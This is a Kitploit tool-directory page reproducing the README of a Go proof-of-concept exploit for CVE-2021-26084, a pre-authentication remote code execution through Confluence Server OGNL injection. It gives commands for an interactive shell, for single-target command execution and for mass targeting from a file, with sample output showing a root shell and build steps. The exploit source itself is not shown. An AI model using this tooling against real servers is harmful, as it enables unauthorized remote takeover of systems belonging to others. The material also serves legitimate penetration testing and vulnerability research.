Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-26084 — CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE) | Kitploit
Tools/GitHubGitHub/taythebot/cve-2021-26084
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubtaythebot/cve-2021-26084

CVE-2021-26084

CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)

View Repository
865 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-26084

Proof of concept for CVE-2021-26084.

Confluence Server Webwork OGNL injection (Pre-Auth RCE)

Disclaimer

This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.

Command Limiations

Due to the payload, it is not possible to pass some characters. The list below is what I've found during my testing.

  • Double quotations "
  • Vertical bar |

Interactive Shell

root@kitploit:~
 go run exploit.go -t <target> -i

Example

root@kitploit:~
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
  • Only works on a single target
  • Type exit to exit the interactive shell
  • Notice shows if possible Windows machine

Single Target

root@kitploit:~
go run exploit.go -t <target> -c <command>

Multiple Targets

root@kitploit:~
go run exploit.go -f <file> -c <command>

Build

root@kitploit:~
go mod download
go build exploit.go
Download Tool